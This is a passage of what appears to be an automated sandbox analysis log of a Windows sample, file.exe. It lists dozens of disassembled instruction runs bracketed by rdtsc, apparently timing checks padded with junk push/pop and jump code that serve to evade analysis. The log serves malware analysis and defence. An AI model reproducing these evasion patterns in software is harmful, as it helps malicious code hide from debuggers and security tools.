              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B567 second address: 129B571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B571 second address: 129B57B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C018Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B849 second address: 129B84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B84D second address: 129B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F67787C0195h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B878 second address: 129B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE51h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B88D second address: 129B893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E868 second address: 129E86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E86C second address: 129E87B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E87B second address: 129E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E882 second address: 129E887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E9B4 second address: 129E9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129ED52 second address: 129ED56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3035 second address: 12A303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A303A second address: 12A303F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A303F second address: 12A304D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6778CEBE46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A304D second address: 12A3063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F67787C018Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3063 second address: 12A3088 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6778CEBE46h 0x00000008 jnc 00007F6778CEBE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6778CEBE51h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A31D9 second address: 12A31F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3356 second address: 12A335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A335A second address: 12A335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A335E second address: 12A3364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A34C3 second address: 12A34E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F67787C0194h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A34E6 second address: 12A34EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A34EA second address: 12A34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A34F0 second address: 12A34F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A34F6 second address: 12A3513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 pushad 0x00000008 jp 00007F67787C0186h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3513 second address: 12A3519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A364E second address: 12A3656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3656 second address: 12A365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EC27 second address: 124EC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FA4C second address: 124FA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FA52 second address: 124FA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FA56 second address: 124FA9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movzx edx, dx 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F6778CEBE48h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov ecx, edi 0x0000002e nop 0x0000002f push ebx 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FA9D second address: 124FAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FAA1 second address: 124FAA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3A7A second address: 12A3A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3A83 second address: 12A3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3A89 second address: 12A3A93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3A93 second address: 12A3A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3A99 second address: 12A3ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jnp 00007F67787C019Eh 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A456E second address: 12A45CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jnc 00007F6778CEBE5Dh 0x00000017 pushad 0x00000018 jp 00007F6778CEBE46h 0x0000001e jng 00007F6778CEBE46h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b popad 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ABA18 second address: 12ABA3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F67787C0186h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F67787C0191h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ABA3A second address: 12ABA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ABA3E second address: 12ABA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F67787C018Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9FB3 second address: 12A9FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AA7E4 second address: 12AA7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAA9A second address: 12AAAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAAA0 second address: 12AAAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAAA6 second address: 12AAAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAD6A second address: 12AAD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F67787C0186h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAD75 second address: 12AAD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAD7A second address: 12AAD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AAD80 second address: 12AADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE58h 0x00000009 jmp 00007F6778CEBE4Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F6778CEBE66h 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AB677 second address: 12AB683 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AB683 second address: 12AB6CB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnp 00007F6778CEBE52h 0x00000012 jne 00007F6778CEBE46h 0x00000018 jp 00007F6778CEBE46h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F6778CEBE4Eh 0x00000028 jbe 00007F6778CEBE58h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0426 second address: 12B0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F67787C018Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0442 second address: 12B0478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE57h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF985 second address: 12AF989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF989 second address: 12AF98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFAEF second address: 12AFAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFAF3 second address: 12AFB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 jnc 00007F6778CEBE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F6778CEBE46h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFB13 second address: 12AFB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFECF second address: 12AFED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFED3 second address: 12AFEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFEE2 second address: 12AFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE59h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0029 second address: 12B002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B002D second address: 12B003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDBBF second address: 12BDBCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F67787C0186h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BBD59 second address: 12BBD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BBD5F second address: 12BBD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC655 second address: 12BC659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC659 second address: 12BC65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA2D second address: 12BCA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA33 second address: 12BCA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA37 second address: 12BCA82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6778CEBE46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6778CEBE53h 0x00000014 jmp 00007F6778CEBE4Ch 0x00000019 popad 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f pushad 0x00000020 jg 00007F6778CEBE52h 0x00000026 jng 00007F6778CEBE46h 0x0000002c ja 00007F6778CEBE46h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA82 second address: 12BCA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA88 second address: 12BCAA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDA61 second address: 12BDA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDA67 second address: 12BDA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDA74 second address: 12BDA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BB913 second address: 12BB919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BB919 second address: 12BB91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E41 second address: 12C2E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C76FC second address: 12C7700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7700 second address: 12C7706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7706 second address: 12C7710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7307 second address: 12C7315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7315 second address: 12C731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C731B second address: 12C7327 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7327 second address: 12C732C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83B4 second address: 12D83BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83BA second address: 12D83CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F67787C019Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83CB second address: 12D83D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83D1 second address: 12D83D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBB95 second address: 12DBBA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB870 second address: 12DB87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F67787C0186h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB87E second address: 12DB887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB887 second address: 12DB88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
